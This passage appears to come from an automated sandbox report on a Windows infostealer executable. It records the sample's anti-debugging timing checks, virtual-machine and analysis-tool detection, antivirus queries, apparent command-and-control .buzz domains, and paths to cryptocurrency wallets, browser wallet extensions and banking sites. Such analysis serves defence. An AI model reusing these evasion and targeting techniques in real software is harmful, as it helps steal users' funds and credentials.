                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F0F02 second address: 52F0F3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 13h 0x00000005 jmp 00007FA944C70C98h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA944C70C97h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F0F3E second address: 52F0F65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-04h], 55534552h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA944B213F3h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F0F65 second address: 52F0F79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA944C70C8Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F0FA5 second address: 52F0FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 52F0FAB second address: 52F0FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5300C11 second address: 5300CA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, A9A2h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FA944B213F4h 0x00000010 push eax 0x00000011 pushad 0x00000012 movsx edi, cx 0x00000015 push ecx 0x00000016 push edi 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b jmp 00007FA944B213F0h 0x00000020 mov ebp, esp 0x00000022 jmp 00007FA944B213F0h 0x00000027 cmp dword ptr [76C8459Ch], 05h 0x0000002e jmp 00007FA944B213F0h 0x00000033 je 00007FA9B643F171h 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FA944B213EEh 0x00000040 jmp 00007FA944B213F5h 0x00000045 popfd 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5300CEF second address: 5300CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5300CF3 second address: 5300D10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5300D10 second address: 5300D16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5300D16 second address: 5300D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5300D1A second address: 5300D4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA944C70C94h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5300D4A second address: 5300D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA944B213EEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5300D5C second address: 5300D60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 531088B second address: 53108BE instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 4068FAE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FA944B213EFh 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA944B213F5h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53108BE second address: 53108C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53108C4 second address: 53108F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FA944B213F1h 0x00000011 jmp 00007FA944B213F0h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53108F2 second address: 5310904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA944C70C8Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5310904 second address: 5310940 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007FA944B213F7h 0x00000010 mov esi, dword ptr [ebp+0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FA944B213F5h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5310940 second address: 5310950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA944C70C8Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5310950 second address: 5310966 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA944B213EAh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5310966 second address: 531096C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 531096C second address: 5310970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5310970 second address: 53109AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FA9B657E6C5h 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 call 00007FA944C70C8Bh 0x00000016 push ecx 0x00000017 pop edx 0x00000018 pop ecx 0x00000019 popad 0x0000001a cmp dword ptr [76C8459Ch], 05h 0x00000021 jmp 00007FA944C70C8Bh 0x00000026 je 00007FA9B659677Bh 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53109AE second address: 53109B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53109B4 second address: 53109BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53109BA second address: 53109BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53109BE second address: 53109FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FA944C70C90h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FA944C70C8Ch 0x00000018 or ax, F028h 0x0000001d jmp 00007FA944C70C8Bh 0x00000022 popfd 0x00000023 mov bx, ax 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 53109FD second address: 5310A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5310A03 second address: 5310A38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA944C70C95h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5310A38 second address: 5310A3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5310A3E second address: 5310A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: 5310AED second address: 5310B5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA944B213ECh 0x00000009 sbb eax, 04B640C8h 0x0000000f jmp 00007FA944B213EBh 0x00000014 popfd 0x00000015 mov di, ax 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop esi 0x0000001c pushad 0x0000001d mov di, cx 0x00000020 mov bx, ax 0x00000023 popad 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007FA944B213EBh 0x0000002e add eax, 1CD497BEh 0x00000034 jmp 00007FA944B213F9h 0x00000039 popfd 0x0000003a jmp 00007FA944B213F0h 0x0000003f popad 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSpecial instruction interceptor: First address: D4AAA1 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSpecial instruction interceptor: First address: BA629A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSpecial instruction interceptor: First address: D76815 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSpecial instruction interceptor: First address: DD4B63 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWindow / User API: threadDelayed 1271Jump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWindow / User API: threadDelayed 1322Jump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWindow / User API: threadDelayed 1199Jump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWindow / User API: threadDelayed 1250Jump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWindow / User API: threadDelayed 1221Jump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWindow / User API: threadDelayed 353Jump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 5604Thread sleep count: 72 > 30Jump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 5604Thread sleep time: -144072s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 5864Thread sleep count: 1271 > 30Jump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 5864Thread sleep time: -2543271s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 4432Thread sleep time: -32000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 6840Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 3456Thread sleep count: 1322 > 30Jump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 3456Thread sleep time: -2645322s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 2040Thread sleep count: 1199 > 30Jump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 2040Thread sleep time: -2399199s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 3552Thread sleep count: 1250 > 30Jump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 3552Thread sleep time: -2501250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 6072Thread sleep count: 1221 > 30Jump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 6072Thread sleep time: -2443221s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 2040Thread sleep count: 353 > 30Jump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exe TID: 2040Thread sleep time: -706353s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: P0SJULJxI0.exe, P0SJULJxI0.exe, 00000000.00000002.2521982736.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: P0SJULJxI0.exe, 00000000.00000003.2504979670.0000000001484000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2506445308.0000000001484000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2524940975.0000000001484000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.1625381463.0000000001484000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2520589257.0000000001447000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2100391243.0000000001484000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2524863223.0000000001447000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2481187488.0000000001484000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: P0SJULJxI0.exe, 00000000.00000002.2521982736.0000000000D2C000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: P0SJULJxI0.exe, 00000000.00000003.1846516524.0000000005CBD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: SICE
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: P0SJULJxI0.exeString found in binary or memory: hummskitnj.buzz
                Source: P0SJULJxI0.exeString found in binary or memory: appliacnesot.buzz
                Source: P0SJULJxI0.exeString found in binary or memory: cashfuzysao.buzz
                Source: P0SJULJxI0.exeString found in binary or memory: inherineau.buzz
                Source: P0SJULJxI0.exeString found in binary or memory: screwamusresz.buzz
                Source: P0SJULJxI0.exeString found in binary or memory: rebuildeso.buzz
                Source: P0SJULJxI0.exeString found in binary or memory: scentniej.buzz
                Source: P0SJULJxI0.exeString found in binary or memory: mindhandru.buzz
                Source: P0SJULJxI0.exeString found in binary or memory: prisonyfork.buzz
                Source: P0SJULJxI0.exe, 00000000.00000002.2522387589.0000000000D73000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 6Program Manager
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: P0SJULJxI0.exe, 00000000.00000003.2504231622.0000000005CE2000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2504979670.0000000001484000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2529181989.0000000005CE2000.00000004.00000800.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000003.2506445308.0000000001484000.00000004.00000020.00020000.00000000.sdmp, P0SJULJxI0.exe, 00000000.00000002.2524940975.0000000001484000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: P0SJULJxI0.exe PID: 5272, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: P0SJULJxI0.exe, 00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: P0SJULJxI0.exe, 00000000.00000003.2100391243.0000000001484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                Source: P0SJULJxI0.exe, 00000000.00000003.2100573523.00000000014D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: P0SJULJxI0.exe, 00000000.00000003.2100391243.0000000001484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: P0SJULJxI0.exe, 00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletC
                Source: P0SJULJxI0.exe, 00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletC
                Source: P0SJULJxI0.exe, 00000000.00000003.2100391243.0000000001484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: P0SJULJxI0.exe, 00000000.00000003.2067395256.00000000014C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: P0SJULJxI0.exe, 00000000.00000003.2504979670.000000000145E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
